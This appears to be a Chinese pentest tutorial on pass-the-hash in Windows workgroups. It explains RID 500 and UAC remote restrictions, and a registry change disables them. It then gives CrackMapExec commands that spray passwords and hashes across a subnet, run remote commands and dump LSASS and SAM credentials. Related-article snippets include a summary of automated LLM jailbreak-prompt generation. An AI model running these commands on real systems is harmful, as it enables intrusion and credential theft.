工作組PTH

文章目錄

          • 簡述
          • RID 500本地管理員密碼噴灑
            • 何為RIP 500 安全標識符
            • SID與RID
            • PTH為何必須是RID 500
            • CrackMapExec進行密碼噴灑

簡述
在工作組PTH中為什么只有administrator賬號可以,下面進行講解與利用。
RID 500本地管理員密碼噴灑
何為RIP 500 安全標識符

安全標識符

安全標識符:安全標識符用于唯一標識安全主體或安全組。 安全主體可以表示可由操作系統進行身份驗證的任何實體,例如用戶帳戶、
計算機帳戶或在用戶或計算機帳戶的安全上下文中運行的線程或進程。每個帳戶或組,或在帳戶的安全上下文中運行的每個進程都具有由頒發機構(如 Windows 域控制器)頒發的唯一 SID。 
SID 存儲在安全數據庫中。 在創建帳戶或組時,系統將生成用于標識特定帳戶或組的 SID。 如果已將某個 SID 用作用戶
或組的唯一標識符,則該 SID 絕不能再次用于標識其他用戶或組。每次用戶登錄時,系統都會為該用戶創建訪問令牌。 訪問令牌包含用戶的 SID、用戶權限以及用戶所屬的任何組的 SID。 
此令牌為用戶在該計算機上執行的任何操作提供安全上下文。除了分配給特定用戶和組的唯一創建的域專用 SID 外,還有用來標識通用群體和通用用戶的公認 SID。 例如,“Everyone and 
World”SID 標識包含所有用戶的組。 公認 SID 的值在所有操作系統中保持不變。從上面的微軟描述中可以認識到安全標識符的作用是用于標識安全主體或者安全組,安全主體比如用戶賬號例子:常見公認SID舉例:
KRBTGT(S-1-5-域-502):密鑰分發中心 (KDC) 服務使用的用戶帳戶。 該帳戶僅存在于域控制器上域管理員:(S-1-5-域-512)包含有權管理域的成員的全局組。 默認情況下,“Domain Admins”組是已加入域的所有計算機
(包括域控制器)上的“Administrators”組的成員。“Domain Admins”是組的任何成員在域的 Active Directory 中創建的
任何對象的默認所有者。 如果組的成員創建其他對象(如文件),則默認所有者是“Administrators”組。管理員(S-1-5-域-500):系統管理員的用戶帳戶。 每臺計算機都有一個本地“Administrator”帳戶,每個域都有一個域“Administrator”
帳戶。“Administrator”帳戶是在操作系統安裝過程中創建的第一個帳戶。 無法刪除、禁用或鎖定此帳戶,但可以重命名此帳戶。
默認情況下,管理員帳戶是“Administrator”組的成員,無法從該組中刪除。從微軟的說明中可以看到Administrator的安全標識符是S-1-5-域-500可是為什么又叫RID 500下面開始講解。
SID與RID
SID(安全標識符) Active Directory 域控制器副本分配SID
RID(相對標識符分配) 本地安全帳戶管理器 (SAM)分配RID

在這里插入圖片描述

從上述微軟說明中可以看到SID的分配涉及到了域相關的部分,創建一個SID由Active Directory 域控制器進行分配
并且將副本廣播到其他域控,RID的分配簡單很多是一個單主機操作并分配與存儲的地方是本機SAM管理的帳戶數據庫中
,這就是SID與RID管理簡單的理解還有許多沒講的比如RIP可以看成是SID的一部分因為RID的頒發機構是SID,詳細可以
具體查看微軟文檔不在過多贅述。
PTH為何必須是RID 500
從上述內容中可以看到除了500之外還有其他安全主體相信大家在PTH的時候到非域環境的時候必須administrator賬號
才能成功為什么其他賬號就不行呢,比如位于管理員組的其他賬號為什么不行,administrator的RID就是500也就是說為何
非RID 500的賬號工作組環境中無法PTH,我建議大家看下微軟的資料。

在服務器管理器中配置遠程管理

重點閱讀:啟用或禁用遠程管理

在這里插入圖片描述

用戶帳戶控制和遠程限制說明

重點閱讀:UAC 遠程限制如何工作本地用戶帳戶(安全帳戶管理器用戶帳戶)

在這里插入圖片描述

	如何禁用UAC遠程限制

在這里插入圖片描述

用戶帳戶控制和 WMI

重點閱讀:在 UAC 下處理遠程連接

在這里插入圖片描述

從重點閱讀的內容多次出現的UAC就能猜到這跟UAC有關那么我將為大家進行簡單的梳理。
啟用或禁用遠程管理:在遠程管理管理的時候內置管理員帳戶之外的本地管理員帳戶也可能不具有遠程管理服務器的權限也就是說,administrator是內置管理員賬號除了它之外的加入到本機管理員組的比如admin賬號是無法進行遠程管理的,WinRM也同樣受此影響。UAC遠程限制如何工作:UAC在遠程登錄的時候比如PTH/WinRM是受到限制的,限制的原因是為了助于防止環回攻擊的惡意軟件。本地用戶帳戶(安全帳戶管理器用戶帳戶):這種UAC限制是通過除內置管理員賬號之外的本機管理員賬號連接都是被降權過的,它們無法進行權限提升,是不完全管理員身份進行連接的,換句話說是已標準用戶身份運行而非管理員身份運行,只有在程協助或遠程桌面管理RDP下才已完全管理員身份進行連接。如何禁用UAC遠程限制:regedit打開注冊表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System找到LocalAccountTokenFilterPolicy項如果不存在則新建創建DWORD的LocalAccountTokenFilterPolicy值的數值為1則禁用UAC遠程限制,本地管理員組賬號如admin在其中則可以正常使用PTH/WinRM等進行登錄。在UAC下處理遠程連接:UAC限制跟是否處于工作組或域中有關,這也就解釋了為什么域管可以正常登錄而不受UAC限制的影響,域賬號的UAC訪問令牌過濾不會被影響。
CrackMapExec進行密碼噴灑
在工作組下為什么只有RID 500才能進行遠程登錄已經講過了下面將進行密碼復用,在工作組中運維或者負責人在安裝
系統的時候為了方便將內置管理員賬號使用同一個密碼可能在多臺機器上同時使用這個時候就可以進行密碼噴灑進行
橫向移動,下面將先進行CrackMapExec工具的使用。
CrackMapExec密碼噴灑:下載地址:https://github.com/byt3bl33d3r/CrackMapExec介紹:進行密碼噴灑命令格式:./cme smb 192.168.80.1/24 -u 'Administrator' -p 'WindowsServer2016' 顯示Pwn3d!說明密碼正確

在這里插入圖片描述

CrackMapExec噴灑并執行命令:
./cme smb 192.168.80.1/24 -u 'Administrator' -p 'WindowsServer2016' --local-auth -x whoami --exec-method smbexec

在這里插入圖片描述

實戰中抓取密碼hash形式而不是明文形式下面使用mimikatz抓取hash然后嘗試hash密碼噴灑	
PTH密碼噴灑:
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a'

在這里插入圖片描述

PTH密碼噴灑執行命令
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a' --local-auth -x whoami --exec-method smbexec

在這里插入圖片描述

利用CrackMapExec模塊
CrackMapExec 協議 -L 查看支持哪些模塊

在這里插入圖片描述

利用lsassy模塊對lsass進行遠程轉儲并查看賬號與密碼hash
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a' -M lsassy

在這里插入圖片描述

可以看到lsassy模塊成功抓取到了WIN-1IH6AQ46IHM\admin ebb81dddafd1c0222fd2022c2da26853
admin的Hash,當然也可以使用其他協議的模塊,需要注意的是不同的協議可用的模塊也不一樣下面查看
下mssql的模塊。

在這里插入圖片描述

當然除了lsass遠程轉儲也可以獲取sam的內容
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a' --local-auth --sam

在這里插入圖片描述

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/11431.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/11431.shtml
英文地址,請注明出處:http://en.pswp.cn/web/11431.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

觸摸OpenNJet,云原生世界觸手可及

🌈個人主頁: Aileen_0v0 🔥熱門專欄: 華為鴻蒙系統學習|計算機網絡|數據結構與算法 ?💫個人格言:“沒有羅馬,那就自己創造羅馬~” 文章目錄 導言OpenNJet云原生引擎介紹云原生平臺的介紹優化與創新 為什么選擇OpenNJet云原生引擎如何在windo…

Pytorch基礎:torch.cuda.set_device函數

相關閱讀 Pytorch基礎https://blog.csdn.net/weixin_45791458/category_12457644.html?spm1001.2014.3001.5482 torch.cuda.set_device函數用于設置當前使用的cuda設備,在當擁有多個可用的GPU且能被pytorch識別的cuda設備情況下(環境變量CUDA_VISIBLE_…

【AI大模型】自動生成紅隊攻擊提示--GPTFUZZER

本篇參考論文為: Yu J, Lin X, Xing X. Gptfuzzer: Red teaming large language models with auto-generated jailbreak prompts[J]. arXiv preprint arXiv:2309.10253, 2023. https://arxiv.org/pdf/2309.10253 一 背景 雖然LLM在今天的各個領域得到了廣泛的運用…

計算方法實驗7:實現三次樣條插值算法

任務 point.txt文件中包含了21個壓鐵的位置信息 利用大M法計算出木條在壓鐵控制下的曲線,邊界條件取自然邊界條件;將第10個壓鐵的位置移動至(0,10),計算出新的曲線,觀察每個區間內的三次函數是否改變。 算法 μ i M i ? 1 2 …

MacOS java多版本安裝與管理

Home - SDKMAN! the Software Development Kit Manager # 安裝sdkman curl -s "https://get.sdkman.io" | bashsource "$HOME/.sdkman/bin/sdkman-init.sh"sdk version正常出現sdkman版本號就安裝成功了 # 安裝java # 安裝java8 sdk install java 8.0…

論文筆記:僅一個進程故障就無法達成共識

僅一個進程故障就無法達成共識 僅一個進程故障指的是在異步的分布式系統中 摘要 異步系統的共識問題(consensus)涉及一組進程,其中有的進程可能不可靠(unreliable)。共識問題要求可靠的進程一致地從兩個侯選中決定&…

【MATLAB源碼-第207期】基于matlab的單相光伏并網系統仿真,并網策略采用基于擾動觀測法的MPPT模型和使用電壓電流雙閉環SPWM控制。

操作環境: MATLAB 2022a 1、算法描述 本文將重點分析光伏發電最大功率點跟蹤(MPPT)技術和逆變器的并網控制技術,并在Simulink環境下建立模擬系統,以體現這些技術的應用與效果。文章結構如下:首先簡介光伏…

OpenAI下周發布更新;TikTok將自動標記AIGC;智譜AI亮相2024 ICLR

OpenAI 官宣下周舉辦直播發布更新 OpenAI 今日凌晨官宣,將在當地時間 5 月 13 日上午十點(北京時間 5 月 14 日凌晨兩點)在官網進行直播,屆時將演示一些 ChatGPT 和 GPT-4 的更新。 OpenAI CEO Sam Altman 補充表示,屆…

【算法刷題day44】Leetcode:518. 零錢兌換 II、377. 組合總和 Ⅳ

文章目錄 Leetcode 518. 零錢兌換 II解題思路代碼總結 Leetcode 377. 組合總和 Ⅳ解題思路代碼總結 草稿圖網站 java的Deque Leetcode 518. 零錢兌換 II 題目:518. 零錢兌換 II 解析:代碼隨想錄解析 解題思路 先遍歷物品,再遍歷背包。 代碼…

2024軟件測試面試必備面試題大全

1. 請自我介紹一下(需簡單清楚的表述自已的基本情況,在這過程中要展現出自信,對工作有激情,上進,好學) 面試官您好,我叫###,今年26歲,來自江西九江,就讀專業是電子商務,…

PCIE協議-2-事務層規范-MEM/IO/CFG request rules

2.2.7 內存、I/O和配置請求規則 以下規則適用于所有內存、I/O和配置請求。每種類型的請求還有特定的額外規則。 所有內存、I/O和配置請求除了常見的頭標字段外,還包括以下字段:requester ID[15:0]和Tag[9:0],形成事務ID。Last DW BE[3:0] a…

ICode國際青少年編程競賽- Python-2級訓練場-列表遍歷

ICode國際青少年編程競賽- Python-2級訓練場-列表遍歷 1、 for i in range(3):Flyer[i].step(2) Dev.step(6)2、 for i in range(7):Flyer[i].step() Dev.step(Item.x - Dev.x)3、 for i in range(3):Flyer[i].step(1) Dev.step(4) Dev.turnLeft() Dev.step(2) Dev.turnL…

【APM】在Kubernetes中搭建OpenTelemetry+Loki+Tempo+Grafana鏈路追蹤(一)

文章目錄 1、最終效果2、前提準備2、環境信息3、服務集成(Opentelemetry ->Tempo)3.1 上報鏈路數據3.1.1 下載opentelemetry-agent3.1.2 啟動配置業務app3.1.3 配置opentelemetry輸入輸出3.1.4 配置grafana datasource3.1.4.1 配置tempo3.1.4.2 配置l…

快速判斷出485從站設備是否支持MODBUS RTU無線通訊

對于變頻器和儀表設備,都支持485串口通訊,那么怎么判斷從站設備支持那種協議呢?通常分為兩種方式去判斷:1.從設備參數參看2.從設備通訊報文查看。本次文章以以臺達MH300系列變頻器為例。 1.從設備通訊參數查看 使用設備之前一定…

資料如何打印更省錢

在日常工作和學習中,我們經常需要打印各種資料。然而,隨著打印成本的不斷提高,如何更省錢地打印資料成為了大家關注的焦點。今天,就為大家分享一些資料打印的省錢技巧,并推薦一個省錢又省心的打印平臺。 首先&#xff…

【話題】軟件開發的航海圖:程序員的實用神器探秘

大家好,我是全棧小5,歡迎閱讀小5的系列文章,這是《話題》系列文章 目錄 背景一、代碼編寫二、版本控制三、測試與調試四、部署與運維五、總結文章推薦 背景 在軟件開發的廣闊海洋中,每一位程序員都是一位勇敢的航海家&#xff0c…

大模型日報2024-05-13

大模型日報 2024-05-13 大模型資訊 谷歌推出Gemini生成式AI平臺 摘要: 生成式人工智能正在改變我們與技術的互動方式。谷歌最近推出了名為Gemini的新平臺,該平臺代表了其在生成式AI領域的最新進展。Gemini平臺集成了一系列先進的工具和功能,旨在為用戶提…

什么是圖片的像素與分辨率?

什么是像素像素是組成圖像的最小單元,把圖片放大到一定程度,你可以看到許多小方塊,一個方塊就是一個像素,這些小方塊都有一個明確的位置和被分配的色彩數值一個個的小方塊拼合起來,就決定圖像所呈現出來的樣子。 像素…

數據結構-棧的講解

棧的概念及結構 棧:一種特殊的線性表,其只允許在固定的一端進行插入和刪除元素操作。 進行數據插入和刪除操作的一端稱為棧頂,另一端稱為棧底(因為先進后出)。棧中的數據元素遵守后進先出LIFO(Last In Firs…

學習注意力機制并將其應用到網絡中

什么是注意力機制 注意力機制的核心重點就是讓網絡關注到它更需要關注的地方。 當我們使用卷積神經網絡去處理圖片的時候,我們會更希望卷積神經網絡去注意應該注意的地方,而不是什么都關注,我們不可能手動去調節需要注意的地方,…